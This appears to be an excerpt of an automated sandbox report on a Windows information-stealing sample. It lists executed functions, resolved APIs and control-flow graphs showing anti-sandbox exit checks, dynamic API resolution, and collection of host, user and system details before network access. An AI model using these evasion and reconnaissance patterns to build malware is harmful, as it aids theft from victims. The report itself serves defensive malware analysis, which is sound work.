26463->26453 26464->26453 26465->26453 26466->26453 26467->26453 26468->26453 26469->26453 26470->25349 26471->25351 26472->25357 26473->25359 26474->25365 26475->25367 26476->25373 26477->25377 26478->25383 26479->25385 26480->25389 26481->25403 26482->25407 26483->25406 26484->25402 26485->25406 26486->25424 26487->25409 26488->25410 26489->25414 26490->25420 26491->25421 26492->25427 26493->25434 26494->25436 26495->25460 26496->25464 26497->25463 26498->25459 26499->25463 26500->25473 26503 fb161f 26502->26503 26504 fb162b lstrcpy 26503->26504 26505 fb1633 26503->26505 26504->26505 26506 fb164d lstrcpy 26505->26506 26507 fb1655 26505->26507 26506->26507 26508 fb166f lstrcpy 26507->26508 26509 fb1677 26507->26509 26508->26509 26510 fb1699 26509->26510 26511 fb1691 lstrcpy 26509->26511 26510->26195 26511->26510 26513 fd71e6 26512->26513 26514 fd71fc lstrcpy 26513->26514 26515 fd2860 26513->26515 26514->26515 26515->25338 26517 fb4bd0 26516->26517 26517->26517 26518 fb4bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 26517->26518 26519 fb4c41 26518->26519 26519->26303 26521 fd3e83 26520->26521 26522 fd3e9f lstrcpy 26521->26522 26523 fd3eab 26521->26523 26522->26523 26524 fd3ecd lstrcpy 26523->26524 26525 fd3ed5 GetSystemTime 26523->26525 26524->26525 26526 fd3ef3 26525->26526 26526->26322 26529 fd732d 26527->26529 26528 fb519b 26531 fd7280 26528->26531 26529->26528 26530 fd733d lstrcpy lstrcat 26529->26530 26530->26528 26532 fd728c 26531->26532 26533 fd72b4 26532->26533 26534 fd72ac lstrcpy 26532->26534 26533->26378 26534->26533 26537 fd72dc 26535->26537 26536 fb51b7 26536->26381 26537->26536 26538 fd72ed lstrcpy lstrcat 26537->26538 26538->26536 26562 fd31f0 GetSystemInfo wsprintfA 26555 fb5869 57 API calls 26574 fc1269 408 API calls 26565 fd2d60 11 API calls 26591 fd2b60 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 26592 fda280 __CxxFrameHandler 26563 fc01d9 126 API calls 26566 fc3959 244 API calls 26540 fd2cd0 GetUserDefaultLocaleName LocalAlloc CharToOemW 26556 fd2853 lstrcpy 26557 fce049 147 API calls 26580 fc8615 48 API calls 26593 fc8615 49 API calls 26541 fd3cc0 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 26581 fd33c0 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 26572 fb16b9 200 API calls 26575 fbf639 144 API calls 26594 fbbf39 177 API calls 26569 fd3130 GetProcessHeap RtlAllocateHeap RegOpenKeyExA RegQueryValueExA RegCloseKey 26582 fcabb2 120 API calls 26583 fc23a9 298 API calls 26598 fc4b29 303 API calls 26577 fb8e20 malloc strcpy_s free std::exception::exception 26542 fd30a0 GetSystemPowerStatus 26564 fd29a0 GetCurrentProcess IsWow64Process 26584 fbdb99 631 API calls 26544 fd749e 6 API calls ctype 26559 fd8819 free free malloc free __getptd 26545 fc2499 290 API calls 26585 fc8615 47 API calls 26570 fd4e35 9 API calls 26599 fb7710 free ctype 26561 fd2c10 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation wsprintfA 26586 fd938d 129 API calls 3 library calls 26600 fbb309 98 API calls 26546 fc8c88 16 API calls 26547 fd2880 10 API calls 26548 fd4480 OpenProcess GetModuleFileNameExA CloseHandle lstrcpy 26549 fd3480 6 API calls 26573 fd3280 7 API calls

                                  Executed Functions

                                  Function 00FB4C50 Relevance: 111.1, APIs: 61, Strings: 2, Instructions: 807stringnetworkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB4C7F
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FB4CD2
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FB4D05
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FB4D35
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FB4D73
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FB4DA6
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00FB4DB6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$InternetOpen
                                  • String ID: "$------
                                  • API String ID: 2041821634-2370822465
                                  • Opcode ID: af19d9435a820c548937823e24e7af58a6902f515abaa3afaf2f12b0da565778
                                  • Instruction ID: 453fde12f8e561a3561f256e584ed3cb380473daf638b5c77a71e9070bc45bf6
                                  • Opcode Fuzzy Hash: af19d9435a820c548937823e24e7af58a6902f515abaa3afaf2f12b0da565778
                                  • Instruction Fuzzy Hash: 81525E31D0121A9BDB21EFA5DC45BEE77BAAF44720F194025F905AB241DB38ED41EFA0
                                  Function 00FD6390 Relevance: 58.0, APIs: 32, Strings: 1, Instructions: 218libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2125 fd6390-fd63bd GetPEB 2126 fd65c3-fd6623 LoadLibraryA * 5 2125->2126 2127 fd63c3-fd65be call fd62f0 GetProcAddress * 20 2125->2127 2129 fd6638-fd663f 2126->2129 2130 fd6625-fd6633 GetProcAddress 2126->2130 2127->2126 2132 fd666c-fd6673 2129->2132 2133 fd6641-fd6667 GetProcAddress * 2 2129->2133 2130->2129 2134 fd6688-fd668f 2132->2134 2135 fd6675-fd6683 GetProcAddress 2132->2135 2133->2132 2136 fd66a4-fd66ab 2134->2136 2137 fd6691-fd669f GetProcAddress 2134->2137 2135->2134 2139 fd66ad-fd66d2 GetProcAddress * 2 2136->2139 2140 fd66d7-fd66da 2136->2140 2137->2136 2139->2140
                                  APIs
                                  • GetProcAddress.KERNEL32(74DD0000,01B92230), ref: 00FD63E9
                                  • GetProcAddress.KERNEL32(74DD0000,01B924E8), ref: 00FD6402
                                  • GetProcAddress.KERNEL32(74DD0000,01B92248), ref: 00FD641A
                                  • GetProcAddress.KERNEL32(74DD0000,01B924A0), ref: 00FD6432
                                  • GetProcAddress.KERNEL32(74DD0000,01B98F88), ref: 00FD644B
                                  • GetProcAddress.KERNEL32(74DD0000,01B85790), ref: 00FD6463
                                  • GetProcAddress.KERNEL32(74DD0000,01B857B0), ref: 00FD647B
                                  • GetProcAddress.KERNEL32(74DD0000,01B92500), ref: 00FD6494
                                  • GetProcAddress.KERNEL32(74DD0000,01B92278), ref: 00FD64AC
                                  • GetProcAddress.KERNEL32(74DD0000,01B92290), ref: 00FD64C4
                                  • GetProcAddress.KERNEL32(74DD0000,01B922A8), ref: 00FD64DD
                                  • GetProcAddress.KERNEL32(74DD0000,01B859D0), ref: 00FD64F5
                                  • GetProcAddress.KERNEL32(74DD0000,01B922C0), ref: 00FD650D
                                  • GetProcAddress.KERNEL32(74DD0000,01B92320), ref: 00FD6526
                                  • GetProcAddress.KERNEL32(74DD0000,01B85A90), ref: 00FD653E
                                  • GetProcAddress.KERNEL32(74DD0000,01B923C8), ref: 00FD6556
                                  • GetProcAddress.KERNEL32(74DD0000,01B92338), ref: 00FD656F
                                  • GetProcAddress.KERNEL32(74DD0000,01B856B0), ref: 00FD6587
                                  • GetProcAddress.KERNEL32(74DD0000,01B923E0), ref: 00FD659F
                                  • GetProcAddress.KERNEL32(74DD0000,01B85810), ref: 00FD65B8
                                  • LoadLibraryA.KERNEL32(01B92590,?,?,?,00FD1C03), ref: 00FD65C9
                                  • LoadLibraryA.KERNEL32(01B92548,?,?,?,00FD1C03), ref: 00FD65DB
                                  • LoadLibraryA.KERNEL32(01B92560,?,?,?,00FD1C03), ref: 00FD65ED
                                  • LoadLibraryA.KERNEL32(01B925A8,?,?,?,00FD1C03), ref: 00FD65FE
                                  • LoadLibraryA.KERNEL32(01B92578,?,?,?,00FD1C03), ref: 00FD6610
                                  • GetProcAddress.KERNEL32(75A70000,01B925C0), ref: 00FD662D
                                  • GetProcAddress.KERNEL32(75290000,01B925D8), ref: 00FD6649
                                  • GetProcAddress.KERNEL32(75290000,01B92518), ref: 00FD6661
                                  • GetProcAddress.KERNEL32(75BD0000,01B92530), ref: 00FD667D
                                  • GetProcAddress.KERNEL32(75450000,01B85A70), ref: 00FD6699
                                  • GetProcAddress.KERNEL32(76E90000,01B98FC8), ref: 00FD66B5
                                  • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00FD66CC
                                  Strings
                                  • NtQueryInformationProcess, xrefs: 00FD66C1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: NtQueryInformationProcess
                                  • API String ID: 2238633743-2781105232
                                  • Opcode ID: 5e22682f9081b65df04d8f6eaf81a8acbed3421da75482fc4ccefdb0bbaf124e
                                  • Instruction ID: 10dca368ce16892f2c605541d256d4ab119096cd0ba92f81395af5fbef58c88e
                                  • Opcode Fuzzy Hash: 5e22682f9081b65df04d8f6eaf81a8acbed3421da75482fc4ccefdb0bbaf124e
                                  • Instruction Fuzzy Hash: AEA171F5A012089FC77CDFE5E548A263BFDF7886583848539E926CB348D734A980DB60
                                  Function 00FD1BF0 Relevance: 45.2, APIs: 30, Instructions: 220stringCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2141 fd1bf0-fd1c0b call fb2a90 call fd6390 2146 fd1c0d 2141->2146 2147 fd1c1a-fd1c27 call fb2930 2141->2147 2148 fd1c10-fd1c18 2146->2148 2151 fd1c29-fd1c2f lstrcpy 2147->2151 2152 fd1c35-fd1c63 2147->2152 2148->2147 2148->2148 2151->2152 2156 fd1c6d-fd1c7b GetSystemInfo 2152->2156 2157 fd1c65-fd1c67 ExitProcess 2152->2157 2158 fd1c7d-fd1c7f ExitProcess 2156->2158 2159 fd1c85-fd1ca0 call fb1030 call fb10c0 GetUserDefaultLangID 2156->2159 2164 fd1cb8-fd1cca call fd2ad0 call fd3e10 2159->2164 2165 fd1ca2-fd1ca9 2159->2165 2171 fd1ccc-fd1cde call fd2a40 call fd3e10 2164->2171 2172 fd1ce7-fd1d06 lstrlen call fb2930 2164->2172 2165->2164 2166 fd1cb0-fd1cb2 ExitProcess 2165->2166 2171->2172 2183 fd1ce0-fd1ce1 ExitProcess 2171->2183 2178 fd1d08-fd1d0d 2172->2178 2179 fd1d23-fd1d40 lstrlen call fb2930 2172->2179 2178->2179 2181 fd1d0f-fd1d11 2178->2181 2186 fd1d5a-fd1d7b call fd2ad0 lstrlen call fb2930 2179->2186 2187 fd1d42-fd1d44 2179->2187 2181->2179 2184 fd1d13-fd1d1d lstrcpy lstrcat 2181->2184 2184->2179 2193 fd1d7d-fd1d7f 2186->2193 2194 fd1d9a-fd1db4 lstrlen call fb2930 2186->2194 2187->2186 2188 fd1d46-fd1d54 lstrcpy lstrcat 2187->2188 2188->2186 2193->2194 2195 fd1d81-fd1d85 2193->2195 2199 fd1dce-fd1deb call fd2a40 lstrlen call fb2930 2194->2199 2200 fd1db6-fd1db8 2194->2200 2195->2194 2197 fd1d87-fd1d94 lstrcpy lstrcat 2195->2197 2197->2194 2206 fd1ded-fd1def 2199->2206 2207 fd1e0a-fd1e0f 2199->2207 2200->2199 2202 fd1dba-fd1dc8 lstrcpy lstrcat 2200->2202 2202->2199 2206->2207 2208 fd1df1-fd1df5 2206->2208 2209 fd1e16-fd1e22 call fb2930 2207->2209 2210 fd1e11 call fb2a20 2207->2210 2208->2207 2211 fd1df7-fd1e04 lstrcpy lstrcat 2208->2211 2215 fd1e24-fd1e26 2209->2215 2216 fd1e30-fd1e66 call fb2a20 * 5 OpenEventA 2209->2216 2210->2209 2211->2207 2215->2216 2218 fd1e28-fd1e2a lstrcpy 2215->2218 2228 fd1e8c-fd1ea0 CreateEventA call fd1b20 call fcffd0 2216->2228 2229 fd1e68-fd1e8a CloseHandle Sleep OpenEventA 2216->2229 2218->2216 2233 fd1ea5-fd1eae CloseHandle ExitProcess 2228->2233 2229->2228 2229->2229
                                  APIs
                                    • Part of subcall function 00FD6390: GetProcAddress.KERNEL32(74DD0000,01B92230), ref: 00FD63E9
                                    • Part of subcall function 00FD6390: GetProcAddress.KERNEL32(74DD0000,01B924E8), ref: 00FD6402
                                    • Part of subcall function 00FD6390: GetProcAddress.KERNEL32(74DD0000,01B92248), ref: 00FD641A
                                    • Part of subcall function 00FD6390: GetProcAddress.KERNEL32(74DD0000,01B924A0), ref: 00FD6432
                                    • Part of subcall function 00FD6390: GetProcAddress.KERNEL32(74DD0000,01B98F88), ref: 00FD644B
                                    • Part of subcall function 00FD6390: GetProcAddress.KERNEL32(74DD0000,01B85790), ref: 00FD6463
                                    • Part of subcall function 00FD6390: GetProcAddress.KERNEL32(74DD0000,01B857B0), ref: 00FD647B
                                    • Part of subcall function 00FD6390: GetProcAddress.KERNEL32(74DD0000,01B92500), ref: 00FD6494
                                    • Part of subcall function 00FD6390: GetProcAddress.KERNEL32(74DD0000,01B92278), ref: 00FD64AC
                                    • Part of subcall function 00FD6390: GetProcAddress.KERNEL32(74DD0000,01B92290), ref: 00FD64C4
                                    • Part of subcall function 00FD6390: GetProcAddress.KERNEL32(74DD0000,01B922A8), ref: 00FD64DD
                                    • Part of subcall function 00FD6390: GetProcAddress.KERNEL32(74DD0000,01B859D0), ref: 00FD64F5
                                    • Part of subcall function 00FD6390: GetProcAddress.KERNEL32(74DD0000,01B922C0), ref: 00FD650D
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FD1C2F
                                  • ExitProcess.KERNEL32 ref: 00FD1C67
                                  • GetSystemInfo.KERNEL32(?), ref: 00FD1C71
                                  • ExitProcess.KERNEL32 ref: 00FD1C7F
                                    • Part of subcall function 00FB1030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00FB1046
                                    • Part of subcall function 00FB1030: VirtualAllocExNuma.KERNEL32(00000000), ref: 00FB104D
                                    • Part of subcall function 00FB1030: ExitProcess.KERNEL32 ref: 00FB1058
                                    • Part of subcall function 00FB10C0: GlobalMemoryStatusEx.KERNEL32 ref: 00FB10EA
                                    • Part of subcall function 00FB10C0: ExitProcess.KERNEL32 ref: 00FB1114
                                  • GetUserDefaultLangID.KERNEL32 ref: 00FD1C8F
                                  • ExitProcess.KERNEL32 ref: 00FD1CB2
                                  • ExitProcess.KERNEL32 ref: 00FD1CE1
                                  • lstrlen.KERNEL32(01B99028), ref: 00FD1CEE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FD1D15
                                  • lstrcat.KERNEL32(00000000,01B99028), ref: 00FD1D1D
                                  • lstrlen.KERNEL32(00FE4B98), ref: 00FD1D28
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FD1D48
                                  • lstrcat.KERNEL32(00000000,00FE4B98), ref: 00FD1D54
                                  • lstrlen.KERNEL32(00000000), ref: 00FD1D63
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FD1D89
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FD1D94
                                  • lstrlen.KERNEL32(00FE4B98), ref: 00FD1D9F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FD1DBC
                                  • lstrcat.KERNEL32(00000000,00FE4B98), ref: 00FD1DC8
                                  • lstrlen.KERNEL32(00000000), ref: 00FD1DD7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FD1DF9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FD1E04
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                                  • String ID:
                                  • API String ID: 3366406952-0
                                  • Opcode ID: 0a8b795519f75f1b6b844b7aecd0c0a4a56c24988078418afc08f804f7039746
                                  • Instruction ID: 66b7747f0249c1bee73df4a610112e09a1df18cec0f7e14be9b2111bff226851
                                  • Opcode Fuzzy Hash: 0a8b795519f75f1b6b844b7aecd0c0a4a56c24988078418afc08f804f7039746
                                  • Instruction Fuzzy Hash: 1671B331900219ABDB74ABF1DC49BAE7BFFBF40715F080025F9169A285DB38D841EB61
                                  Function 00FB4A60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2850 fb4a60-fb4afc RtlAllocateHeap 2867 fb4b7a-fb4bbe VirtualProtect 2850->2867 2868 fb4afe-fb4b03 2850->2868 2869 fb4b06-fb4b78 2868->2869 2869->2867
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FB4AA2
                                  • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00FB4BB0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeapProtectVirtual
                                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                  • API String ID: 1542196881-3329630956
                                  • Opcode ID: a3f7e266916a4da17db1307156f9fa7c093d6209794f8fafb16d572342cb10c8
                                  • Instruction ID: 9673196907a3282b637b370e1ff470cc6e853c786474d3e6204da8b35fc96fed
                                  • Opcode Fuzzy Hash: a3f7e266916a4da17db1307156f9fa7c093d6209794f8fafb16d572342cb10c8
                                  • Instruction Fuzzy Hash: 4231A515F8039C769620EBEF4CC7F5F6ED5FF85760B02405A75087718289A9E501EAA3
                                  Function 00FD2AD0 Relevance: 4.5, APIs: 3, Instructions: 44memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2957 fd2ad0-fd2b22 GetProcessHeap RtlAllocateHeap GetComputerNameA 2958 fd2b44-fd2b59 2957->2958 2959 fd2b24-fd2b36 2957->2959
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00FD2AFF
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FD2B06
                                  • GetComputerNameA.KERNEL32(00000000,00000104), ref: 00FD2B1A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateComputerNameProcess
                                  • String ID:
                                  • API String ID: 1664310425-0
                                  • Opcode ID: 71db5fed4258009d1a4a99b14f9010de537700bb87e225975bdcaded33d0e6c5
                                  • Instruction ID: 61c6af2879da58af0dae27f83ca571eaec8f7a35cad35e1864fccd77bd778078
                                  • Opcode Fuzzy Hash: 71db5fed4258009d1a4a99b14f9010de537700bb87e225975bdcaded33d0e6c5
                                  • Instruction Fuzzy Hash: B101AD72A44248ABC720DFD9E845BAEFBBCF744B25F00026AF919E7780D775590087A1
                                  Function 00FD2A40 Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00FD2A6F
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FD2A76
                                  • GetUserNameA.ADVAPI32(00000000,00000104), ref: 00FD2A8A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
